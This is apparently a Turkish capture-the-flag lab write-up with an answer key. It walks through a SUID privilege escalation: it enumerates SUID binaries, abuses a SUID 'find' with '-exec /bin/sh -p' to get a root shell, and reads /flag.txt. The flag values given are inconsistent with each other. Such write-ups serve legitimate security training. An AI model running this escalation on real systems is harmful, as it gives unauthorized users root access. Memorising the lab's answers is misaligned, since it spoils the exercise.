# Privilege Escalation 4 File Permissions (SUID)


**Açıklama**:

Yanlış konfigüre edilmiş dosya izinlerini kullanarak yetkinizi yükseltin ve sistemi ele geçirin.

**Amaç**:

- Yetki Yükseltmek
- /flag.txt'i okumak

**Flags**:
- Yanlış konfigüre edilmiş uygulama?
    - answer: **find**
- flag.txt?
    - answer: **CyberPath{aAmnRZ6XZXBW9xuV}**

## **Solution**:

```bash
victim@ubuntu:~$ uname -a
Linux ubuntu 5.13.0-1022-aws #24~20.04.1-Ubuntu SMP Thu Apr 7 22:10:15 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
victim@ubuntu:~$ crontab -l
bash: crontab: command not found
victim@ubuntu:~$ sudo -l
[sudo] password for victim: 
victim@ubuntu:~$ sudo -v
Sorry, user victim may not run sudo on ubuntu.
victim@ubuntu:~$ ls -la
total 20
drwxr-xr-x 2 victim victim 4096 May  4 10:50 .
drwxr-xr-x 1 root   root   4096 May  4 10:50 ..
-rw-r--r-- 1 victim victim  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 victim victim 3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 victim victim  807 Feb 25  2020 .profile
victim@ubuntu:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/umount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/find
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
victim@ubuntu:~$ /usr/bin/find . -exec /bin/sh -p \; -quit
# whoami
root
# id
uid=1000(victim) gid=1000(victim) euid=0(root) groups=1000(victim)
# cat /flag.txt
CyberPath{flag}
# 
```